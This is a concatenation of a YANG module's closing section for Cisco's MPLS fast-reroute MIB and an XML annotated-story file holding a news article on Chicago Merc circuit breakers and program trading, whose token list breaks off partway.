smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.3";
}
leaf cmplsFrrLogEventType {
type enumeration {
enum "other" {
value "1";
}
enum "protected" {
value "2";
}
}
description
"This object describes what type of fast reroute event
occurred.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.4";
}
leaf cmplsFrrLogEventDuration {
type yang:timeticks;
description
"This object describes the duration of this event.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.5";
}
leaf cmplsFrrLogEventReasonString {
type binary {
length "128";
}
description
"This object contains an implementation-specific explanation
of the event.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1.2.1.6";
}
}
}
container cmplsFrrFacRouteDBTable {
description
"The mplsFrrFacRouteDBTable provides information about the
fast reroute database. Each entry belongs to an interface,
protecting backup tunnel and protected tunnel. MPLS
interfaces defined on this node are protected by backup
tunnels and are indexed by mplsFrrFacRouteProtectedIndex.
Backup tunnels defined to protect the tunnels traversing an
interface, and are indexed by
mplsFrrFacRouteProtectingTunIndex. Note that the tunnel
instance index is not required, since it is implied to be 0,
which indicates the tunnel head interface for the protecting
tunnel. The protecting tunnel is defined to exist on the PLR
in the FRR specification. Protected tunnels are the LSPs that
traverse the protected link. These LSPs are uniquely
identified by mplsFrrFacRouteProtectedTunIndex,
mplsFrrFacRouteProtectedTunInstance,
mplsFrrFacRouteProtectedTunIngressLSRId, and
mplsFrrFacRouteProtectedTunEgressLSRId.";
reference
"Srinivansan, C., and A. Viswanathan, T. Nadeau, MPLS Traffic
Engineering Management Information Base Using SMIv2,
draft-ietf-mpls-te-mib-06.txt ";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1";
list cmplsFrrFacRouteDBEntry {
key "cmplsFrrFacRouteProtectedIfIndex cmplsFrrFacRouteProtectingTunIndex cmplsFrrFacRouteProtectedTunIndex cmplsFrrFacRouteProtectedTunInstance cmplsFrrFacRouteProtectedTunIngressLSRId cmplsFrrFacRouteProtectedTunEgressLSRId";
description
"An entry in the mplsFrrDBTable represents a single protected
LSP, protected by a backup tunnel and defined for a specific
protected interface. Note that for brevity, managers should
consult the mplsTunnelTable present in the MPLS-TE MIB for
additional information about the protecting and protected
tunnels, and the ifEntry in the IF-MIB for the protected
interface.";
reference
"Srinivansan, C., and A. Viswanathan, T. Nadeau, MPLS Label
Switch Router Management Information Base Using SMIv2,
draft-ietf-mpls-lsr-mib-07.txt Srinivansan, C., and A.
Viswanathan, T. Nadeau, MPLS Traffic Engineering Management
Information Base Using SMIv2, draft-ietf-mpls-te-mib-
06.txt.";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1";
leaf cmplsFrrFacRouteProtectedIfIndex {
type if-mib:InterfaceIndex;
description
"Uniquely identifies the interface configured for FRR protection.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.1";
}
leaf cmplsFrrFacRouteProtectingTunIndex {
type mpls-tc:MplsTunnelIndex;
description
"Uniquely identifies the mplsTunnelEntry primary index for
the tunnel head interface designated to protect the
interface as specified in the mplsFrrFacRouteIfProtectedIndex
(and all of the tunnels using this interface).";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.2";
}
leaf cmplsFrrFacRouteProtectedTunIndex {
type mpls-tc:MplsTunnelIndex;
description
"Uniquely identifies an mplsTunnelEntry that is
being protected by FRR.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.3";
}
leaf cmplsFrrFacRouteProtectedTunInstance {
type mpls-tc:MplsTunnelInstanceIndex;
description
"Uniquely identifies an mplsTunnelEntry that is
being protected by FRR.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.4";
}
leaf cmplsFrrFacRouteProtectedTunIngressLSRId {
type mpls-tc:MplsLsrIdentifier;
description
"Uniquely identifies an mplsTunnelEntry that is
being protected by FRR.";
reference
"1. RSVP-TE: Extensions to RSVP for LSP Tunnels,
Awduche et al, RFC 3209, December 2001
2. Constraint-Based LSP Setup using LDP, Jamoussi
(Editor), RFC 3212, January 2002";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.5";
}
leaf cmplsFrrFacRouteProtectedTunEgressLSRId {
type mpls-tc:MplsLsrIdentifier;
description
"Uniquely identifies an mplsTunnelEntry that is
being protected by FRR.";
smiv2:max-access "not-accessible";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.6";
}
leaf cmplsFrrFacRouteProtectedTunStatus {
type enumeration {
enum "active" {
value "1";
}
enum "ready" {
value "2";
}
enum "partial" {
value "3";
}
}
description
"Specifies the state of the protected tunnel.
active - This tunnel's label has been placed in the
LFIB and is ready to be applied to incoming
packets.
ready - This tunnel's label entry has been created but is
not yet in the LFIB.
partial - This tunnel's label entry has not been fully
created.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.7";
}
leaf cmplsFrrFacRouteProtectingTunResvBw {
type mpls-tc:MplsBitRate;
description
"Specifies the amount of bandwidth in megabytes per second
that is actually reserved by the backup tunnel for
facility backup. This value is repeated here from the MPLS-
TE MIB because the tunnel entry will reveal the bandwidth
reserved by the signaling protocol, which is typically 0
for backup tunnels so as to not over-book bandwidth.
However, internal reservations are typically made on the
PLR, thus this value should be revealed here.";
smiv2:max-access "read-only";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.8";
}
leaf cmplsFrrFacRouteProtectingTunProtectionType {
type enumeration {
enum "linkProtection" {
value "0";
}
enum "nodeProtection" {
value "1";
}
}
description
"Indicates type of the resource protection.";
smiv2:defval "nodeProtection";
smiv2:max-access "read-write";
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3.1.1.9";
}
}
}
}
notification cmplsFrrProtected {
description
"This notification is generated when a tunnel running over an
interface as specified in the mplsFrrConstTable is initially
protected by the backup tunnel also specified in the
cmplsFrrConstTable. This notification should not be generated
for each subsequent tunnel that is backed up by the FRR feature
on this LSR, as this may result in potential scaling issues
with regard to LSR performance and network loading. Note also
that notifications MUST be generated in accordance with the
cmplsFrrNotifMaxRate.";
smiv2:oid "1.3.6.1.4.1.9.10.98.0.1";
container object-1 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstNumProtectingTunOnIf {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstNumProtectingTunOnIf";
}
}
}
container object-2 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstNumProtectedTunOnIf {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstNumProtectedTunOnIf";
}
}
}
container object-3 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstBandwidth {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstBandwidth";
}
}
}
}
notification cmplsFrrUnProtected {
description
"This notification is generated when the final tunnel that is
being protected by a backup tunnel as specified in the
cmplsFrrConstTable is restored to normal operation. This
notification should not be generated for each restored tunnel,
as this may result in potential scaling issues with regard to
LSR performance and network loading. Note also that
notifications MUST be generated in accordance with the
cmplsFrrNotifMaxRate.";
smiv2:oid "1.3.6.1.4.1.9.10.98.0.2";
container object-1 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstNumProtectingTunOnIf {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstNumProtectingTunOnIf";
}
}
}
container object-2 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstNumProtectedTunOnIf {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstNumProtectedTunOnIf";
}
}
}
container object-3 {
leaf cmplsFrrConstIfIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstIfIndex";
}
}
leaf cmplsFrrConstTunnelIndex {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelIndex";
}
}
leaf cmplsFrrConstTunnelInstance {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstTunnelInstance";
}
}
leaf cmplsFrrConstBandwidth {
type leafref {
path "/CISCO-IETF-FRR-MIB:CISCO-IETF-FRR-MIB/CISCO-IETF-FRR-MIB:cmplsFrrConstTable/CISCO-IETF-FRR-MIB:cmplsFrrConstEntry/CISCO-IETF-FRR-MIB:cmplsFrrConstBandwidth";
}
}
}
}
smiv2:alias "cmplsFrrMIB" {
smiv2:oid "1.3.6.1.4.1.9.10.98";
}
smiv2:alias "cmplsFrrNotif" {
smiv2:oid "1.3.6.1.4.1.9.10.98.0";
}
smiv2:alias "cmplsFrrScalars" {
smiv2:oid "1.3.6.1.4.1.9.10.98.1";
}
smiv2:alias "cmplsFrrObjects" {
smiv2:oid "1.3.6.1.4.1.9.10.98.2";
}
smiv2:alias "cmplsFrrGeneralObjects" {
smiv2:oid "1.3.6.1.4.1.9.10.98.2.1";
}
smiv2:alias "cmplsFrr1to1Objects" {
smiv2:oid "1.3.6.1.4.1.9.10.98.2.2";
}
smiv2:alias "cmplsFrrFacObjects" {
smiv2:oid "1.3.6.1.4.1.9.10.98.2.3";
}
smiv2:alias "cmplsFrrConformance" {
smiv2:oid "1.3.6.1.4.1.9.10.98.3";
}
smiv2:alias "cmplsFrrGroups" {
smiv2:oid "1.3.6.1.4.1.9.10.98.3.1";
}
smiv2:alias "cmplsFrrCompliances" {
smiv2:oid "1.3.6.1.4.1.9.10.98.3.2";
}
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<story>
<rep id="edu.mit.story.char">
<desc id="0" len="5352" off="0">
The Chicago Mercantile Exchange said it plans to institute an additional
``circuit breaker'' aimed at stemming market slides. Separately, John
Phelan told a closed House subcommittee meeting in Washington that he
would support Securities and Exchange Commission halts of program trading
during market emergencies. But the New York Stock Exchange chairman said
he doesn't support reinstating a ``collar'' on program trading, arguing
that firms could get around such a limit. The Chicago Merc said a new
one-hour price limit would take effect in its Standard & Poor's 500
stock-index futures pit once S&P 500 futures fell 20 index points -- the
equivalent of about a 150-point drop in the Dow Jones Industrial Average.
If the 20-point limit is triggered after 1:30 p.m. Chicago time, it would
remain in effect until the normal close of trading at 3:15 p.m. With the
limit in effect, members would be able to execute trades at the limit
price or at higher prices, but not below it. The exchange said it decided
a new circuit breaker was needed following a review of the tumultuous
trading in stocks and stock-index futures on Friday Oct. 13, when the Dow
Jones industrials plunged 190 points and stock-index futures prices skidded
as well. Late that afternoon the S&P 500 stock-index futures contract fell
a total of 30 index points, hitting a Merc circuit breaker limit that
remained in effect for the rest of the trading session. The Merc said that
its existing 30-minute, 12-point limit on S&P 500 stock-index futures trading is
equal to about 100 points on the Dow Jones industrials, which was triggered
Oct. 13, will remain in effect. Leo Melamed, Merc executive committee chairman,
said that the 12-point limit appeared to lessen the selling panic Oct. 13.
But when the contract reopened, the subsequent flood of sell orders that
quickly knocked the contract down to the 30-point limit indicated that the
intermediate limit of 20 points was needed to help keep stock and stock-index
futures prices synchronized. Several traders maintained that the Merc's 12-point
circuit-breaker aggravated the market slide Oct. 13 by directing additional
selling pressure to the floor of the New York Stock Exchange. All of the changes
require regulatory approval, which is expected shortly. The exchange also said
that the 30-point circuit breaker, which currently provides only a one-hour
respite during market sell-offs, will become the maximum one-day limit for the
S&P 500 stock-index futures contract; the one-day limit now is 50 index points.
A final modification was made to the five-point opening limit for the contract.
The Merc said that five-point limit will remain in effect for the first 10 minutes
of trading. The limit lapses under current exchange rules if contracts trade above
the limit price during the opening 10 minutes of trading. In Washington, House
aides said Mr. Phelan told congressmen that the collar, which banned program trades
through the Big Board's computer when the Dow Jones Industrial Average moved 50
points, didn't work well. He said that firms could get around the collar by executing
trades manually. In a post-hearing news conference, Mr. Phelan, who has publicly
expressed concern about market volatility, said he told the House finance and
telecommunications subcommittee that he would support the program-trading halt proposal
``providing the SEC would be comfortable with the language'' in a bill. The
program-trading issue is heating up on Capitol Hill as it is on Wall Street, and
several legislators want to grant the SEC the power to shut off the programs
when trading becomes too volatile. SEC Chairman Richard Breeden has said he would be
willing to consider circuit breakers that have preset trigger points, but he doesn't
want discretionary power to stop programs. A House aide suggested that Mr. Phelan was
so ``vague and mushy'' that it was the kind of meeting where people of all viewpoints
could ``come out feeling good.'' At one point, Mr. Phelan angered the subcommittee's
chairman, Rep. Edward Markey D., Mass., by not going much beyond what already had been
reported in the morning newspapers. ``Markey said we could have done this in public''
because so little sensitive information was disclosed, the aide said. Mr. Phelan then
responded that he would have been happy just writing a report to the panel, the aide added.
At another point during the hearing, Rep. Markey asked Mr. Phelan what would be discussed
at a New York exchange board meeting today. Mr. Phelan said the Big Board is likely to
study the program-trading issue. That response annoyed Rep. Markey, House aides said, and
the congressman snapped back that there had been enough studies of the issue and that it
was time for action on the matter. Fifteen of the 26 subcommittee members attended the
hearing, most notably Rep. John Dingell D., Mich., the full House Energy and Commerce
Committee chairman, who has been willing to let Mr. Markey carry the legislation in recent
months. Mr. Dingell expressed concern, sources said, about jurisdictional problems in
regulating program trading, which uses futures to offset stock trades. The futures industry
is regulated by the Commodity Futures Trading Commission, which reports to the Agriculture
committees in both houses.
</desc>
</rep>
<rep id="edu.mit.story.text">
<desc id="1" len="5352" off="0">TEXT</desc>
</rep>
<rep id="edu.mit.parsing.token">
<desc id="2" len="3" off="0">The</desc>
<desc id="4" len="7" off="4">Chicago</desc>
<desc id="6" len="10" off="12">Mercantile</desc>
<desc id="8" len="8" off="23">Exchange</desc>
<desc id="10" len="4" off="32">said</desc>
<desc id="12" len="2" off="37">it</desc>
<desc id="14" len="5" off="40">plans</desc>
<desc id="16" len="2" off="46">to</desc>
<desc id="18" len="9" off="49">institute</desc>
<desc id="20" len="2" off="59">an</desc>
<desc id="22" len="10" off="62">additional</desc>
<desc id="24" len="2" off="74">``</desc>
<desc id="26" len="7" off="76">circuit</desc>
<desc id="28" len="7" off="84">breaker</desc>
<desc id="30" len="2" off="91">''</desc>
<desc id="32" len="5" off="94">aimed</desc>
<desc id="34" len="2" off="100">at</desc>
<desc id="36" len="8" off="103">stemming</desc>
<desc id="38" len="6" off="112">market</desc>
<desc id="40" len="6" off="119">slides</desc>
<desc id="42" len="1" off="125">.</desc>
<desc id="45" len="10" off="127">Separately</desc>
<desc id="47" len="1" off="137">,</desc>
<desc id="49" len="4" off="139">John</desc>
<desc id="51" len="6" off="145">Phelan</desc>
<desc id="53" len="4" off="152">told</desc>
<desc id="55" len="1" off="157">a</desc>
<desc id="57" len="6" off="159">closed</desc>
<desc id="59" len="5" off="166">House</desc>
<desc id="61" len="12" off="172">subcommittee</desc>
<desc id="63" len="7" off="185">meeting</desc>
<desc id="65" len="2" off="193">in</desc>
<desc id="67" len="10" off="196">Washington</desc>
<desc id="69" len="4" off="207">that</desc>
<desc id="71" len="2" off="212">he</desc>
<desc id="73" len="5" off="216">would</desc>
<desc id="75" len="7" off="222">support</desc>
<desc id="77" len="10" off="230">Securities</desc>
<desc id="79" len="3" off="241">and</desc>
<desc id="81" len="8" off="245">Exchange</desc>
<desc id="83" len="10" off="254">Commission</desc>
<desc id="85" len="5" off="265">halts</desc>
<desc id="87" len="2" off="271">of</desc>
<desc id="89" len="7" off="274">program</desc>
<desc id="91" len="7" off="282">trading</desc>
<desc id="93" len="6" off="291">during</desc>
<desc id="95" len="6" off="298">market</desc>
<desc id="97" len="11" off="305">emergencies</desc>
<desc id="99" len="1" off="316">.</desc>
<desc id="102" len="3" off="318">But</desc>
<desc id="104" len="3" off="322">the</desc>
<desc id="106" len="3" off="326">New</desc>
<desc id="108" len="4" off="330">York</desc>
<desc id="110" len="5" off="335">Stock</desc>
<desc id="112" len="8" off="341">Exchange</desc>
<desc id="114" len="8" off="350">chairman</desc>
<desc id="116" len="4" off="359">said</desc>
<desc id="118" len="2" off="365">he</desc>
<desc id="120" len="4" off="368">does</desc>
<desc id="122" len="3" off="372">n't</desc>
<desc id="124" len="7" off="376">support</desc>
<desc id="126" len="11" off="384">reinstating</desc>
<desc id="128" len="1" off="396">a</desc>
<desc id="130" len="2" off="398">``</desc>
<desc id="132" len="6" off="400">collar</desc>
<desc id="134" len="2" off="406">''</desc>
<desc id="136" len="2" off="409">on</desc>
<desc id="138" len="7" off="412">program</desc>
<desc id="140" len="7" off="420">trading</desc>
<desc id="142" len="1" off="427">,</desc>
<desc id="144" len="7" off="429">arguing</desc>
<desc id="146" len="4" off="438">that</desc>
<desc id="148" len="5" off="443">firms</desc>
<desc id="150" len="5" off="449">could</desc>
<desc id="152" len="3" off="455">get</desc>
<desc id="154" len="6" off="459">around</desc>
<desc id="156" len="4" off="466">such</desc>
<desc id="158" len="1" off="471">a</desc>
<desc id="160" len="5" off="473">limit</desc>
<desc id="162" len="1" off="478">.</desc>
<desc id="165" len="3" off="480">The</desc>
<desc id="167" len="7" off="484">Chicago</desc>
<desc id="169" len="4" off="492">Merc</desc>
<desc id="171" len="4" off="497">said</desc>
<desc id="173" len="1" off="502">a</desc>
<desc id="175" len="3" off="504">new</desc>
<desc id="177" len="8" off="509">one-hour</desc>
<desc id="179" len="5" off="518">price</desc>
<desc id="181" len="5" off="524">limit</desc>
<desc id="183" len="5" off="530">would</desc>
<desc id="185" len="4" off="536">take</desc>
<desc id="187" len="6" off="541">effect</desc>
<desc id="189" len="2" off="548">in</desc>
<desc id="191" len="3" off="551">its</desc>
<desc id="193" len="8" off="555">Standard</desc>
<desc id="195" len="1" off="564">&</desc>
<desc id="197" len="4" off="566">Poor</desc>
<desc id="199" len="2" off="570">'s</desc>
<desc id="201" len="3" off="573">500</desc>
<desc id="203" len="11" off="578">stock-index</desc>
<desc id="205" len="7" off="590">futures</desc>
<desc id="207" len="3" off="598">pit</desc>
<desc id="209" len="4" off="602">once</desc>
<desc id="211" len="3" off="607">S&P</desc>
<desc id="213" len="3" off="611">500</desc>
<desc id="215" len="7" off="615">futures</desc>
<desc id="217" len="4" off="623">fell</desc>
<desc id="219" len="2" off="628">20</desc>
<desc id="221" len="5" off="631">index</desc>
<desc id="223" len="6" off="637">points</desc>
<desc id="225" len="2" off="644">--</desc>
<desc id="227" len="3" off="647">the</desc>
<desc id="229" len="10" off="652">equivalent</desc>
<desc id="231" len="2" off="663">of</desc>
<desc id="233" len="5" off="666">about</desc>
<desc id="235" len="1" off="672">a</desc>
<desc id="237" len="9" off="674">150-point</desc>
<desc id="239" len="4" off="684">drop</desc>
<desc id="241" len="2" off="689">in</desc>
<desc id="243" len="3" off="692">the</desc>
<desc id="245" len="3" off="696">Dow</desc>
<desc id="247" len="5" off="700">Jones</desc>
<desc id="249" len="10" off="706">Industrial</desc>
<desc id="251" len="7" off="717">Average</desc>
<desc id="253" len="1" off="724">.</desc>
<desc id="256" len="2" off="727">If</desc>
<desc id="258" len="3" off="730">the</desc>
<desc id="260" len="8" off="734">20-point</desc>
<desc id="262" len="5" off="743">limit</desc>
<desc id="264" len="2" off="749">is</desc>
<desc id="266" len="9" off="752">triggered</desc>
<desc id="268" len="5" off="762">after</desc>
<desc id="270" len="4" off="768">1:30</desc>
<desc id="272" len="3" off="773">p.m</desc>
<desc id="274" len="1" off="776">.</desc>
<desc id="276" len="7" off="778">Chicago</desc>
<desc id="278" len="4" off="786">time</desc>
<desc id="280" len="1" off="790">,</desc>
<desc id="282" len="2" off="792">it</desc>
<desc id="284" len="5" off="795">would</desc>
<desc id="286" len="6" off="802">remain</desc>
<desc id="288" len="2" off="809">in</desc>
<desc id="290" len="6" off="812">effect</desc>
<desc id="292" len="5" off="819">until</desc>
<desc id="294" len="3" off="825">the</desc>
<desc id="296" len="6" off="829">normal</desc>
<desc id="298" len="5" off="836">close</desc>
<desc id="300" len="2" off="842">of</desc>
<desc id="302" len="7" off="845">trading</desc>
<desc id="304" len="2" off="853">at</desc>
<desc id="306" len="4" off="856">3:15</desc>
<desc id="308" len="3" off="861">p.m</desc>
<desc id="310" len="1" off="864">.</desc>
<desc id="313" len="4" off="866">With</desc>
<desc id="315" len="3" off="871">the</desc>
<desc id="317" len="5" off="876">limit</desc>
<desc id="319" len="2" off="882">in</desc>
<desc id="321" len="6" off="885">effect</desc>
<desc id="323" len="1" off="891">,</desc>
<desc id="325" len="7" off="893">members</desc>
<desc id="327" len="5" off="901">would</desc>
<desc id="329" len="2" off="907">be</desc>
<desc id="331" len="4" off="910">able</desc>
<desc id="333" len="2" off="915">to</desc>
<desc id="335" len="7" off="918">execute</desc>
<desc id="337" len="6" off="926">trades</desc>
<desc id="339" len="2" off="933">at</desc>
<desc id="341" len="3" off="936">the</desc>
<desc id="343" len="5" off="940">limit</desc>
<desc id="345" len="5" off="947">price</desc>
<desc id="347" len="2" off="953">or</desc>
<desc id="349" len="2" off="956">at</desc>
<desc id="351" len="6" off="959">higher</desc>
<desc id="353" len="6" off="966">prices</desc>
<desc id="355" len="1" off="972">,</desc>
<desc id="357" len="3" off="974">but</desc>
<desc id="359" len="3" off="978">not</desc>
<desc id="361" len="5" off="982">below</desc>
<desc id="363" len="2" off="988">it</desc>
<desc id="365" len="1" off="990">.</desc>
<desc id="368" len="3" off="992">The</desc>
<desc id="370" len="8" off="996">exchange</desc>
<desc id="372" len="4" off="1005">said</desc>
<desc id="374" len="2" off="1010">it</desc>
<desc id="376" len="7" off="1013">decided</desc>
<desc id="378" len="1" off="1022">a</desc>
<desc id="380" len="3" off="1024">new</desc>
<desc id="382" len="7" off="1028">circuit</desc>
<desc id="384" len="7" off="1036">breaker</desc>
<desc id="386" len="3" off="1044">was</desc>
<desc id="388" len="6" off="1048">needed</desc>
<desc id="390" len="9" off="1055">following</desc>
<desc id="392" len="1" off="1065">a</desc>
<desc id="394" len="6" off="1067">review</desc>
<desc id="396" len="2" off="1074">of</desc>
<desc id="398" len="3" off="1077">the</desc>
<desc id="400" len="10" off="1081">tumultuous</desc>
<desc id="402" len="7" off="1093">trading</desc>
<desc id="404" len="2" off="1101">in</desc>
<desc id="406" len="6" off="1104">stocks</desc>
<desc id="408" len="3" off="1111">and</desc>
<desc id="410" len="11" off="1115">stock-index</desc>
<desc id="412" len="7" off="1127">futures</desc>
<desc id="414" len="2" off="1135">on</desc>
<desc id="416" len="6" off="1138">Friday</desc>
<desc id="418" len="4" off="1145">Oct.</desc>
<desc id="420" len="2" off="1150">13</desc>
<desc id="422" len="1" off="1152">,</desc>
<desc id="424" len="4" off="1154">when</desc>
<desc id="426" len="3" off="1159">the</desc>
<desc id="428" len="3" off="1163">Dow</desc>
<desc id="430" len="5" off="1168">Jones</desc>
<desc id="432" len="11" off="1174">industrials</desc>
<desc id="434" len="7" off="1186">plunged</desc>
<desc id="436" len="3" off="1194">190</desc>
<desc id="438" len="6" off="1198">points</desc>
<desc id="440" len="3" off="1205">and</desc>
<desc id="442" len="11" off="1209">stock-index</desc>
<desc id="444" len="7" off="1221">futures</desc>
<desc id="446" len="6" off="1229">prices</desc>
<desc id="448" len="7" off="1236">skidded</desc>
<desc id="450" len="2" off="1245">as</desc>
<desc id="452" len="4" off="1248">well</desc>
<desc id="454" len="1" off="1252">.</desc>
<desc id="457" len="4" off="1254">Late</desc>
<desc id="459" len="4" off="1259">that</desc>
<desc id="461" len="9" off="1264">afternoon</desc>
<desc id="463" len="3" off="1274">the</desc>
<desc id="465" len="3" off="1278">S&P</desc>
<desc id="467" len="3" off="1282">500</desc>
<desc id="469" len="11" off="1286">stock-index</desc>
<desc id="471" len="7" off="1298">futures</desc>
<desc id="473" len="8" off="1306">contract</desc>
<desc id="475" len="4" off="1315">fell</desc>
